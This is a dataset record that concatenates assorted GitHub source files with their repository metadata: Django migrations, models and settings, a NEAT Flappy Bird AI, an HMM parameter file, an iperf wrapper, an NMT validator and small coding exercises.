153d4d409dd7f93f7c62b1eefadb07baeb56dccf | 06afde537edeccf393106a95e4d6e03b164b03bf | /airline/flights/migrations/0004_passenger.py | e0e2968093a393f39b75730d8b54a46c7ba829e2 | [] | no_license | moustafamahdy/MyProjects | 025eced26ee5c8eebbc396c764e5ccfdc8739b8c | 51943815004dfc4450d5c3b95a0f58c5c8060928 | refs/heads/master | 2023-05-13T01:20:26.409788 | 2021-05-30T09:05:01 | 2021-05-30T09:05:01 | 371,940,183 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 689 | py | # Generated by Django 3.1.7 on 2021-05-23 12:13
from django.db import migrations, models
class Migration(migrations.Migration):
    """Auto-generated Django migration: create the Passenger model."""

    dependencies = [
        ('flights', '0003_auto_20210523_1057'),
    ]

    operations = [
        migrations.CreateModel(
            name='Passenger',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('first', models.CharField(max_length=64)),
                ('last', models.CharField(max_length=64)),
                # M2M: a passenger may be on many flights; reverse accessor
                # on Flight is `passengers`.
                ('flights', models.ManyToManyField(blank=True, related_name='passengers', to='flights.Flight')),
            ],
        ),
    ]
| [
"moustafa.cena1997@gmail.com"
] | moustafa.cena1997@gmail.com |
f9316f11cad08f96cbfe0273ec66617794c9de3d | 635ad5c4fe923ce67619f5275f2a4fa35882676a | /assignment_6/src/markov_model.py | b545e774c05aefe99f410da34d02dc683bf8b088 | [] | no_license | justinbrush702/bioinformatics | 1441530e0ca405df1470b6fd336c4e4449405ccf | 778fddc9659b61eb9d9d5014853ad1acb1b8bd6c | refs/heads/master | 2021-01-11T17:57:51.262903 | 2017-08-07T06:53:26 | 2017-08-07T06:53:26 | 79,883,881 | 0 | 0 | null | 2017-08-07T06:53:27 | 2017-01-24T06:06:51 | Python | UTF-8 | Python | false | false | 433 | py | states = ('Fair', 'Loaded')
observations = ('1', '2', '3', '4', '5', '6')
start_probability = {'Fair': 1.0, 'Loaded': 1.0}
transition_probability = {
'Fair': {'Fair': .95, 'Loaded': .05},
'Loaded': {'Fair': .1, 'Loaded': .9}
}
emission_probability = {
'Fair': {'1': 1.0/6.0, '2': 1.0/6.0, '3': 1.0/6.0, '4': 1.0/6.0, '5': 1.0/6.0, '6': 1.0/6.0},
'Loaded': {'1': .1, '2': .1, '3': .1, '4': .1, '5': .1, '6': .5}
}
| [
"jbrush@pugetsound.edu"
] | jbrush@pugetsound.edu |
5c06b3491ae1c4100e4ad79d68d3243a832be824 | 809d3ec4425c952836cc41386a09d5150e1ef756 | /bbva/apps.py | f8a8764e8b57749e14ef73fc6c3baeef1ffc3619 | [] | no_license | luartony/datawasi_bbva | 9e197694a3f7df451f636f93c18736ad4f86e5d3 | ef630ca177c67c5878f9d65273f2e4f76c85a3f9 | refs/heads/main | 2022-12-30T10:03:41.568777 | 2020-10-18T15:40:37 | 2020-10-18T15:40:37 | 305,002,469 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 83 | py | from django.apps import AppConfig
class BbvaConfig(AppConfig):
    """Django application configuration for the `bbva` app."""
    name = 'bbva'
| [
"luartony@gmail.com"
] | luartony@gmail.com |
4cbd2d75e88612f80a7b5d0d48737e6509bdb6e6 | f4c394e57526a4810520b0461f7c23803ab4bbc5 | /hackerrank/intro/arithmeticOperators.py | dc9c563e10df4ebbcff0c28cf10d91c11f624601 | [] | no_license | anandk10/MyPythonPractice | 7a794b5c6ceb926f4bdd94b8f235ac0d788ff6ea | 4b84fe868832aa7d00947d4da2386f536c107293 | refs/heads/master | 2021-01-10T14:30:43.658040 | 2016-02-12T23:41:33 | 2016-02-12T23:41:33 | 51,621,638 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 264 | py | # Enter your code here. Read input from STDIN. Print output to STDOUT
# Problem link : https://www.hackerrank.com/challenges/python-arithmetic-operators
# Python 2.7
num1 = int(raw_input())
num2 = int(raw_input())
print(num1+num2)
print(num1-num2)
print(num1*num2) | [
"askarand@ads.iu.edu"
] | askarand@ads.iu.edu |
b104d48e41d9130046b0c49a32c62beba8f2a35d | de24f83a5e3768a2638ebcf13cbe717e75740168 | /moodledata/vpl_data/85/usersdata/179/58876/submittedfiles/funcoes1.py | e9ffe616ef1b13fe73cb6d7961c81ad1912c3af5 | [] | no_license | rafaelperazzo/programacao-web | 95643423a35c44613b0f64bed05bd34780fe2436 | 170dd5440afb9ee68a973f3de13a99aa4c735d79 | refs/heads/master | 2021-01-12T14:06:25.773146 | 2017-12-22T16:05:45 | 2017-12-22T16:05:45 | 69,566,344 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,154 | py | # -*- coding: utf-8 -*-
def crescente(a):
    """Return True when the list is strictly increasing.

    Bug fixes vs. the original: it compared a[i] with the *list* [i+1]
    instead of a[i+1], indexed one past the end, and returned the undefined
    names ``true``/``false``. The original's ``>`` operator looked inverted
    for a function named "crescente" (increasing); this uses ``<`` between
    neighbours, i.e. each element must be smaller than the next.
    """
    for i in range(len(a) - 1):
        if a[i] >= a[i + 1]:
            return False
    return True
def decrescente(a):
    """Return True when the list is strictly decreasing.

    Bug fixes vs. the original: it compared a[i] with the *list* [i+1]
    instead of a[i+1], indexed one past the end, and returned the undefined
    names ``true``/``false``. Each element must be greater than the next.
    """
    for i in range(len(a) - 1):
        if a[i] <= a[i + 1]:
            return False
    return True
def consecutivo(a):
    """Return True when every element equals the next (all values identical).

    Mirrors the original's ``==`` comparison between neighbours, with the
    same bugs fixed as in crescente/decrescente (list-literal comparison,
    off-by-one indexing, undefined ``true``/``false``). NOTE(review): the
    name ("consecutive") could also mean a[i+1] == a[i] + 1 — confirm the
    intended semantics against the assignment statement.
    """
    for i in range(len(a) - 1):
        if a[i] != a[i + 1]:
            return False
    return True
# Main program: read three lists of n integers and report, with 'S'/'N',
# whether each one is increasing, decreasing and constant respectively.
b = []
c = []
d = []
n = int(input('digite o valor de n :'))
for i in range(0, n, 1):
    valor = int(input('digite o valor :'))
    b.append(valor)
if crescente(b):
    print('S')
else:
    print('N')
for i in range(0, n, 1):
    valor = int(input('digite o valor :'))
    c.append(valor)
if decrescente(c):
    print('S')
else:
    print('N')
for i in range(0, n, 1):
    valor = int(input('digite o valor :'))
    d.append(valor)
if consecutivo(d):  # fixed: was misspelled `consecultivo` (NameError at runtime)
    print('S')
else:
    print('N')
#escreva as demais funções
#escreva o programa principal
| [
"rafael.mota@ufca.edu.br"
] | rafael.mota@ufca.edu.br |
f774b0b029f5480227625c6e47a5628159a4158a | 80ef10042f32c49254e7e35aebfec0f59b3e8aad | /setup.py | b77d0a540df682d654498cd5c5702d4ab07bdc82 | [] | no_license | liuzheng1990/boto3m | 70a7db42721c729a6674ba85cc7656202939fbe3 | e62ae81bce2e011f0bb0d3ffd8e0f6621366220b | refs/heads/master | 2020-03-26T13:34:34.499278 | 2017-08-20T12:29:55 | 2017-08-20T12:29:55 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 430 | py | #!/usr/bin/env python3
import boto3m
import sys
from setuptools import setup, find_packages
install_requires = ['boto3']  # runtime dependency

# Standard setuptools packaging; the version is single-sourced from the
# package itself (boto3m is imported at the top of this file).
setup(name='boto3m',
      version=boto3m.__version__,
      description="Boto3 multiprocessing extension.",
      author="Chase Nicholl",
      author_email='me@chasenicholl.com',
      url='https://github.com/chasenicholl/boto3m',
      packages=find_packages(),
      install_requires=install_requires)
| [
"chasenicholl@gmail.com"
] | chasenicholl@gmail.com |
cdaacfbe7fce884d91c74e79e4a520fdf8185bea | 382ce68736c1dee91dcb5eb7846eff10519d2b70 | /etcewrappers/utils/iperfserver.py | f780cf8d9b291281079960623c45cbb9d682bb1a | [] | permissive | adjacentlink/python-etce | 4345c7bd719f18022fdb96b0c30efc529948f87c | 72d58535e230f3178b1cab9616a3412514dabaf3 | refs/heads/master | 2023-08-18T05:08:53.519074 | 2022-11-17T16:47:44 | 2022-11-17T16:47:44 | 103,570,572 | 7 | 4 | BSD-3-Clause | 2022-10-11T11:13:42 | 2017-09-14T19:01:27 | Python | UTF-8 | Python | false | false | 3,528 | py | #
# Copyright (c) 2015-2018,2020 - Adjacent Link LLC, Bridgewater, New Jersey
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in
# the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Adjacent Link LLC nor the names of its
# contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
#
from __future__ import absolute_import, division, print_function
import time
from etce.wrapper import Wrapper
class IPerfServer(Wrapper):
    """
    Execute iperf as a server. The iperfserver file should contain, at
    most, one line of iperf common and server options. The iperf server
    command will be built as 'iperf -s [file options] [arg values]. Lines
    starting with "#" is ignored as comments. If multiple non-comment
    lines are found, only the last one is used.
    """

    def register(self, registrar):
        # Declare this wrapper's input/output files and optional arguments
        # with the ETCE framework.
        registrar.register_infile_name('iperfserver.conf')
        registrar.register_outfile_name('iperfserver.log')
        registrar.register_argument(
            'interval',
            None,
            'iperf measurement interval (iperf -i switch ' \
            'argument)')
        registrar.register_argument(
            'bufferlen',
            None,
            'iperf buffer length (iperf -l switch argument)')

    def run(self, ctx):
        # No input file on this node means it should not run an iperf server.
        if not ctx.args.infile:
            return
        # run as daemon, log to output file and add argument specified via input file
        argstr = '-D -o %s' % ctx.args.outfile
        if ctx.args.interval is not None:
            argstr += ' -i %d ' % ctx.args.interval
        if ctx.args.bufferlen is not None:
            argstr += ' -l %d ' % ctx.args.bufferlen
        fileargstr = ''
        # NOTE(review): the comment test uses line[0] (unstripped), so a '#'
        # preceded by whitespace is NOT treated as a comment — confirm intended.
        serverarglines = [line.strip() for line
                          in open(ctx.args.infile).readlines()
                          if len(line.strip()) > 0
                          and line[0] != '#']
        # take the last non-comment line as the iperf input
        if len(serverarglines) > 0:
            fileargstr = serverarglines[-1]
        argstr = '-s %s %s' % (fileargstr, argstr)
        ctx.run('iperf', argstr)

    def stop(self, ctx):
        ctx.stop()
        # iperfserver takes some time to close down
        time.sleep(5)
| [
"eschreiber@adjacentlink.com"
] | eschreiber@adjacentlink.com |
81311fc1eca0f83f3b69ff29b9514f2cf9cd7215 | 010ac0bc179509a77336dcc963c88a9b46117415 | /flappy bird 1.py | 5505ad0e6e1f14b77802b454c6fec81792a428c1 | [] | no_license | quirijnve/flappy-bird-ai | a9464751acde49e362846b802c756c9016fc543e | 5f07f242b32ea5a4a079798a6ec68bffab862285 | refs/heads/master | 2020-12-10T14:44:55.882296 | 2020-01-14T18:03:22 | 2020-01-14T18:03:22 | 233,623,156 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 9,333 | py | import pygame
import neat
import time
import os
import random
import pickle
pygame.font.init()  # init font
WIN_WIDTH = 500
WIN_HEIGHT = 800
GEN = 0  # generation counter, incremented by main() once per NEAT generation
win = pygame.display.set_mode((WIN_WIDTH, WIN_HEIGHT))
# Sprite assets, scaled 2x. NOTE(review): absolute Windows paths — the game
# only runs where E:/PY/files/flappy_bird/imgs exists.
BIRD_IMGS = [pygame.transform.scale2x(pygame.image.load(os.path.join("E:/PY/files/flappy_bird/imgs", "bird1.png"))),
             pygame.transform.scale2x(pygame.image.load(os.path.join("E:/PY/files/flappy_bird/imgs", "bird2.png"))),
             pygame.transform.scale2x(pygame.image.load(os.path.join("E:/PY/files/flappy_bird/imgs", "bird3.png")))]
PIPE_IMG = pygame.transform.scale2x(pygame.image.load(os.path.join("E:/PY/files/flappy_bird/imgs", "pipe.png")))
BASE_IMG = pygame.transform.scale2x(pygame.image.load(os.path.join("E:/PY/files/flappy_bird/imgs", "base.png")))
BG_IMG = pygame.transform.scale2x(pygame.image.load(os.path.join("E:/PY/files/flappy_bird/imgs", "bg.png")))
STAT_FONT = pygame.font.SysFont("comicsansms", 40)  # HUD font for score/generation
class Bird:
    """The player sprite: jump/gravity physics, tilt and wing-flap animation."""
    IMGS = BIRD_IMGS
    MAX_ROTATION = 25   # maximum upward tilt, in degrees
    ROT_VEL = 20        # degrees rotated nose-down per frame while falling
    ANIMATION_TIME = 5  # frames each wing image stays on screen

    def __init__(self, x, y):
        self.x = x
        self.y = y
        self.tilt = 0         # current sprite rotation in degrees
        self.tick_count = 0   # frames elapsed since the last jump
        self.vel = 0
        self.height = self.y  # y position at the moment of the last jump
        self.img_count = 0    # animation frame counter
        self.img = self.IMGS[0]

    def jump(self):
        # Negative velocity is upward (pygame's y axis grows downward).
        self.vel = -10.5
        self.tick_count = 0
        self.height = self.y

    def move(self):
        self.tick_count += 1
        # displacement this frame: v*t + 1.5*t^2 (simple gravity curve)
        d = self.vel*self.tick_count + 1.5*self.tick_count**2
        if d >= (16):
            d = 16  # terminal velocity: don't let the bird fall too fast
        if d < 0:
            d -= 2  # moving up: add a little extra lift
        self.y =self.y + d
        if d < 0 or self.y < self.height + 50:
            if self.tilt < self.MAX_ROTATION:
                self.tilt = self.MAX_ROTATION  # tilt slightly upward while rising
        else:
            if self.tilt > -90:
                self.tilt -= self.ROT_VEL  # rotate nose-down while falling

    def draw(self, win):
        self.img_count += 1
        # Wing-flap animation: cycle images 0 -> 1 -> 2 -> 1 -> 0, each shown
        # for ANIMATION_TIME frames, then reset the counter.
        if self.img_count < self.ANIMATION_TIME:
            self.img = self.IMGS[0]
        elif self.img_count < self.ANIMATION_TIME*2:
            self.img = self.IMGS[1]
        elif self.img_count < self.ANIMATION_TIME*3:
            self.img = self.IMGS[2]
        elif self.img_count < self.ANIMATION_TIME*4:
            self.img = self.IMGS[1]
        elif self.img_count == self.ANIMATION_TIME*4 + 1:
            self.img = self.IMGS[0]
            self.img_count = 0
        if self.tilt <= -80:
            # Nose-diving: freeze on the level-wing frame.
            self.img = self.IMGS[1]
            self.img_count = self.ANIMATION_TIME*2
        # Rotate the sprite around its centre instead of the top-left origin.
        rotated_image = pygame.transform.rotate(self.img, self.tilt)
        new_rect = rotated_image.get_rect(center=self.img.get_rect(topleft = (self.x, self.y)).center)
        win.blit(rotated_image, new_rect.topleft)

    def get_mask(self):
        # Mask of opaque pixels, used for pixel-perfect collision detection.
        return pygame.mask.from_surface(self.img)
class Pipe:
    """A pipe pair (top + bottom) separated by a fixed vertical gap."""
    GAP = 200  # vertical gap the bird must fly through
    VEL = 5    # horizontal scroll speed, pixels per frame

    def __init__(self, x):
        self.x = x
        self.height = 0
        self.top = 0     # y where the top pipe image is drawn
        self.bottom = 0  # y where the bottom pipe image is drawn
        self.PIPE_TOP = pygame.transform.flip(PIPE_IMG, False, True)  # upside-down image for the top pipe
        self.PIPE_BOTTOM = PIPE_IMG  # image for the bottom pipe
        self.passed = False  # set once the bird has flown past this pipe
        self.set_height()

    def set_height(self):
        # Random gap position; `top` compensates for the image's top-left origin.
        self.height = random.randrange(50, 450)
        self.top = self.height - self.PIPE_TOP.get_height()
        self.bottom = self.height + self.GAP

    def move(self):
        self.x -= self.VEL  # scroll left, making the bird appear to fly forward

    def draw(self, win):
        # draw both halves of the pipe pair
        win.blit(self.PIPE_TOP, (self.x, self.top))
        win.blit(self.PIPE_BOTTOM, (self.x, self.bottom))

    def collide(self, bird):
        # Pixel-perfect collision via masks (per-pixel opacity maps).
        bird_mask = bird.get_mask()
        top_mask = pygame.mask.from_surface(self.PIPE_TOP)
        bottom_mask = pygame.mask.from_surface(self.PIPE_BOTTOM)
        # offsets: distance between the bird's origin and each pipe's origin
        top_offset = (self.x - bird.x, self.top - round(bird.y))
        bottom_offset = (self.x - bird.x, self.bottom - round(bird.y))
        # overlap() returns the first overlapping point, or None
        b_point = bird_mask.overlap(bottom_mask, bottom_offset)
        t_point = bird_mask.overlap(top_mask, top_offset)
        if t_point or b_point:
            return True
        return False
class Base:
    """The scrolling ground: two copies of one image leap-frog each other so
    the ground appears endless without a single huge texture."""
    VEL = 5  # must match Pipe.VEL so ground and pipes scroll together
    WIDTH = BASE_IMG.get_width()
    IMG = BASE_IMG

    def __init__ (self, y):
        self.y = y
        self.x1 = 0           # first copy starts at x = 0
        self.x2 = self.WIDTH  # second copy starts immediately behind it

    def move(self):
        # Both copies scroll left; whichever leaves the screen on the left is
        # repositioned directly behind the other.
        self.x1 -= self.VEL
        self.x2 -= self.VEL
        if self.x1 + self.WIDTH < 0:
            self.x1 = self.x2 + self.WIDTH
        if self.x2 + self.WIDTH < 0:
            self.x2 = self.x1 + self.WIDTH

    def draw(self, win):
        win.blit(self.IMG, (self.x1, self.y))
        win.blit(self.IMG, (self.x2, self.y))
def draw_window(window, birds, pipes, base, score, gen):
    """Redraw one frame: background, pipes, HUD (score + generation), ground
    and every live bird, then flip the display.

    Fix: the original ignored its `window` parameter and drew on the global
    `win`; the surface passed by the caller is now used throughout.
    """
    window.blit(BG_IMG, (0,0))  # blit = draw onto the surface
    for pipe in pipes:
        pipe.draw(window)
    text = STAT_FONT.render("Score: " + str(score), 1,(255,255,255))
    window.blit(text, (WIN_WIDTH - 10 - text.get_width(), 10))  # top-right corner
    text = STAT_FONT.render("Gen: " + str(gen), 1,(255,255,255))
    window.blit(text, (10, 10))  # top-left corner
    base.draw(window)
    for bird in birds:
        bird.draw(window)
    pygame.display.update()
def main(genomes, config):
    """NEAT fitness function: simulate one generation of birds until all die.

    `genomes` is the list of (id, genome) pairs supplied by NEAT; each genome
    drives one bird through its own feed-forward network. Fitness is shaped
    by: +0.1 per frame alive, +5 per pipe passed, -1 for hitting a pipe.
    """
    global GEN
    GEN += 1
    nets = []
    ge = []
    birds = []
    for _, g in genomes:  # one network + one bird per genome
        net = neat.nn.FeedForwardNetwork.create(g, config)
        nets.append(net)
        birds.append(Bird(230, 350))
        g.fitness = 0
        ge.append(g)

    base = Base(730)
    pipes = [Pipe(600)]
    clock = pygame.time.Clock()
    score = 0

    run = True
    while run:
        clock.tick(30)  # cap the loop at 30 fps
        for event in pygame.event.get():
            if event.type == pygame.QUIT:
                run = False
                pygame.quit()
                quit()

        # Pick which pipe the networks should look at: the second one once
        # the birds have flown past the first.
        pipe_ind = 0
        if len(birds) > 0:
            if len(pipes) > 1 and birds[0].x > pipes[0].x + pipes[0].PIPE_TOP.get_width():
                pipe_ind = 1
        else:
            run = False  # no birds left: this generation is over
            break

        for x, bird in enumerate(birds):
            bird.move()
            ge[x].fitness += 0.1  # small reward per frame survived
            # network inputs: bird height and vertical distances to the pipe gap
            output = nets[x].activate((bird.y, abs(bird.y - pipes[pipe_ind].height), abs(bird.y - pipes[pipe_ind].bottom)))
            if output[0] > 0.5:  # single output neuron: jump above 0.5
                bird.jump()

        #bird.move()
        add_pipe = False
        rem = []  # pipes to delete this frame
        for pipe in pipes:
            for x, bird in enumerate(birds):
                if pipe.collide(bird):
                    ge[x]. fitness -= 1  # penalise hitting a pipe
                    birds.pop(x)
                    nets.pop(x)
                    ge.pop(x)  # drop bird/network/genome together
                if not pipe.passed and pipe.x < bird.x:  # bird just cleared this pipe
                    pipe.passed = True
                    add_pipe = True  # spawn a new pipe
            if pipe.x + pipe.PIPE_TOP.get_width() < 0:  # pipe fully off screen
                rem.append(pipe)
            pipe.move()

        if add_pipe:
            score += 1
            for g in ge:
                g.fitness += 5  # every surviving genome is rewarded for the pass
            pipes.append(Pipe(600))
        for r in rem:
            pipes.remove(r)

        for x, bird in enumerate(birds):
            if bird.y + bird.img.get_height() >= 730 or bird.y < 0:
                birds.pop(x)
                nets.pop(x)
                ge.pop(x)  # remove birds that hit the ground or the ceiling

        base.move()  # scroll the ground
        draw_window(win, birds, pipes, base, score, GEN)
def run(config_path):
    """Load the NEAT config, build a population and evolve with main() as the
    fitness function for up to 10000 generations."""
    config = neat.config.Config(neat.DefaultGenome, neat.DefaultReproduction,
                                neat.DefaultSpeciesSet, neat.DefaultStagnation,
                                config_path)  # the required NEAT sections
    p = neat.Population(config)
    p.add_reporter(neat.StdOutReporter(True))  # per-generation statistics on stdout
    stats = neat.StatisticsReporter()
    p.add_reporter(stats)
    winner = p.run(main,10000)  # best genome after evolution finishes
if __name__ == "__main__":
    # Resolve the NEAT config file and start evolution.
    local_dir = "E:/PY/files/flappy_bird/"
    config_path = os.path.join(local_dir, "config-feedforward.txt")
    run(config_path)
"noreply@github.com"
] | noreply@github.com |
ae336a597ede11303d18e76036cbc9ac291953b5 | 6c90112e7d21086ef06432bb417bdb339fed4c33 | /django-tally/api/models.py | 11af0648223a22b4581387c627995055a13352e3 | [
"MIT"
] | permissive | blakelobato/BetterBusinessByReview | 9767a04cf1b1a8a8e96cdea634a24887182834ff | 1f8f0a03dc24a661b112b60fed1946142d918294 | refs/heads/master | 2022-04-04T00:08:37.474620 | 2020-02-06T21:01:00 | 2020-02-06T21:01:00 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,205 | py | from django.db import models
from django.conf import settings
from django.core.validators import int_list_validator
from django.contrib.auth.models import User
# Create your models here.
class Url(models.Model):
    """A user-submitted URL together with the word/phrase scores computed for it."""
    id = models.IntegerField(primary_key=True, )
    url = models.CharField(max_length=5000)
    # created = models.DateTimeField(auto_now_add=True)#saved on first input into database
    # updated = models.DateTimeField(auto_now=True)
    date = models.DateTimeField(auto_now_add=True)  # set once, when the row is first saved
    user = models.ForeignKey(settings.AUTH_USER_MODEL, on_delete=models.CASCADE,)  # rows vanish with their user
    word_phrase = models.CharField(max_length=50)
    # null=True: the scores may be absent until analysis has run
    high_rating_score = models.DecimalField(max_digits=3, decimal_places=2, null=True)
    low_rating_score = models.DecimalField(max_digits=3, decimal_places=2, null=True)

    def __str__(self):
        return '{}'.format(self.url)
class WordListAPI(models.Model):
    """Word/phrase entries with their high- and low-rating scores (max 9.99)."""
    id = models.IntegerField(primary_key=True)
    word_phrase = models.CharField(max_length=50)
    high_rating_score = models.DecimalField(max_digits=3, decimal_places=2)
    low_rating_score = models.DecimalField(max_digits=3, decimal_places=2)
| [
"LilySu@users.noreply.github.com"
] | LilySu@users.noreply.github.com |
d16e973a859df614621c3e5e61024c381e586512 | db24b911ca1e0fe33ee27a104e036d7254cf5a66 | /torchnmt/executors/validator.py | 3c968678495e5dc2accefdc88c93e95c3a388ba8 | [] | no_license | jbdel/multimedic | d5bd2f3890cabe69560716757611902f356d5d39 | 28460be61dbdbdbd80b02ceac16441ca67599942 | refs/heads/main | 2023-03-14T14:09:07.342122 | 2021-03-10T11:50:38 | 2021-03-10T11:50:38 | 341,607,986 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,750 | py | import os
import tqdm
import numpy as np
import torch
from .base import Executor
from torchnmt.scorers.scores import compute_scores
from torchnmt.networks.rnn.beam import evaluation as rnn_evaluation
from torchnmt.networks.huggingface.beam import evaluation as transformerhug_evaluation
from torchnmt.networks.vqa.beam import evaluation as vqa_evaluation
# from torchnmt.networks.rnn.beam import eval as rnn_eval
class Validator(Executor):
def __init__(self, opts):
super().__init__(opts)
def iteration_iter(self):
yield
def on_iteration_start(self):
self.skip_iteration()
class NMTValidator(Validator):
def __init__(self, models, metrics, opts, seed=0):
super().__init__(opts)
self.models = models
self.metrics = metrics
self.epoch = 0
self.best_rouge = 0.0
self.seed = seed
self.out_dir = os.path.join('ckpt',
self.opts.name)
os.makedirs(self.out_dir, exist_ok=True)
def epoch_iter(self):
assert isinstance(self.models, list)
splits = [(split,
self.create_data_loader(split),
)
for split in self.opts.splits]
self.scores = []
for split, dl in splits:
print('Running split: {} by ensembling {} models. '
'Using {}.'.format(split,
len(self.models),
type(dl.batch_sampler.sampler).__name__,
))
self.split = split
self.dl = dl
yield
def on_epoch_start(self):
self.models = [m.eval() for m in self.models]
eval_func = type(self.models[0]).__name__.lower() + '_evaluation'
with torch.no_grad():
self.losses, self.refs, self.hyps = eval(eval_func)(self.models, self.opts, self.dl)
def on_epoch_end(self):
# Handle loss
loss = np.mean(self.losses)
ppl = np.exp(loss)
print('{}:\tloss: {:.4g}, ppl: {:.4g}'.format(self.split, loss, ppl))
refs = self.refs
hyps = self.hyps
# Handle scores
base = os.path.join(self.out_dir, '{}_{}_{}'.format(self.split, self.seed, '{}'))
scores = compute_scores(refs, hyps, base, self.metrics)
print(scores)
with open(base.format('metrics.txt'), 'a+') as f:
f.write(str({
'split': self.split,
'epoch': self.epoch,
'scores': scores,
'loss': loss,
'ppl': ppl,
}) + '\n')
self.scores.append(scores)
self.models = [m.train() for m in self.models]
| [
"jeanbenoit.delbrouck@gmail.com"
] | jeanbenoit.delbrouck@gmail.com |
73b8253035b13946cdbafdad3f3ff53fae1a417a | a14dd601cde67f67d0ba38dfd1362f7c0109cef1 | /arrays/leetcode/grid/set-matrix-zeroes-73.py | 4b6d885e0787eeebbf94701b9d37fb1cd5bc4ce0 | [] | no_license | Meaha7/dsa | d5ea1615f05dae32671af1f1c112f0c759056473 | fa80219ff8a6f4429fcf104310f4169d007af712 | refs/heads/main | 2023-09-03T18:52:41.950294 | 2021-11-05T09:14:42 | 2021-11-05T09:14:42 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,232 | py | grids = [
[[1, 1, 1], [1, 0, 1], [1, 1, 1]],
[[0, 1, 2, 0], [3, 4, 5, 2], [1, 3, 1, 5]],
[[1, 2, 3, 4], [5, 0, 7, 8], [0, 10, 11, 12], [13, 14, 15, 0]]
]
# T=mn,S=m+n
def main(grid):
m, n = len(grid), len(grid[0])
rows, cols = set(), set()
for i in range(m):
for j in range(n):
if not grid[i][j]:
rows.add(i)
cols.add(j)
for i in range(m):
for j in range(n):
if i in rows or j in cols:
grid[i][j] = 0
return grid
for grid in grids:
print(main(grid))
print()
# T=mn,S=1
def main(grid):
m, n = len(grid), len(grid[0])
fr, fc = False, False
for i in range(m):
for j in range(n):
if not grid[i][j]:
if not i:
fr = True
if not j:
fc = True
grid[i][0] = grid[0][j] = 0
for i in range(1, m):
for j in range(1, n):
if not grid[i][0] or not grid[0][j]:
grid[i][j] = 0
if fr:
for j in range(n):
grid[0][j] = 0
if fc:
for i in range(m):
grid[i][0] = 0
for grid in grids:
main(grid)
print(grid)
| [
"nikhilgoyal104ah4@gmail.com"
] | nikhilgoyal104ah4@gmail.com |
8396c013dc029751bc9675ccf8409518068611f2 | 63eb364d4c9e0aef7b57c7aa3cf06d0308982f33 | /venv/Scripts/pip-script.py | 3fffadc24636273d925fd5a7ba113ccc1897b22f | [] | no_license | mash0807/AppiumPython | c95089d38603a94fca3724dabeddfed6dc24cfed | 1ac6ecb6b28721a5ba8818dab1b2186d06098f37 | refs/heads/master | 2021-05-19T00:37:28.003656 | 2020-03-31T04:11:58 | 2020-03-31T04:11:58 | 251,498,140 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 388 | py | #!D:\AppiumPython\venv\Scripts\python.exe
# EASY-INSTALL-ENTRY-SCRIPT: 'pip==19.0.3','console_scripts','pip'
__requires__ = 'pip==19.0.3'
import re
import sys
from pkg_resources import load_entry_point
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(
load_entry_point('pip==19.0.3', 'console_scripts', 'pip')()
)
| [
"masihui2013@163.com"
] | masihui2013@163.com |
5728c56ad2589961379fc5bf44dde89a8da0f905 | 33600be564a24994e929d600b372f7f619036103 | /pool/pool/settings.py | 728397ef7dfa7209d8404596f3aaa09f2bc92bfd | [] | no_license | AlimbekovE/hackfest | b386f78020808652956124a205963a3a65c64ab2 | a147a7c9ab27afffc46cc7a173812b508fbdbbdd | refs/heads/master | 2021-04-15T13:34:21.577393 | 2018-03-24T18:15:16 | 2018-03-24T18:15:16 | 126,627,314 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,122 | py | """
Django settings for pool project.
Generated by 'django-admin startproject' using Django 1.11.
For more information on this file, see
https://docs.djangoproject.com/en/1.11/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.11/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.11/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '&p7p+o+8cxgsi$nqyhdyfsn94h+$ey_0^6973xe0o7o2=3r+c_'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'rest_framework',
'quiz',
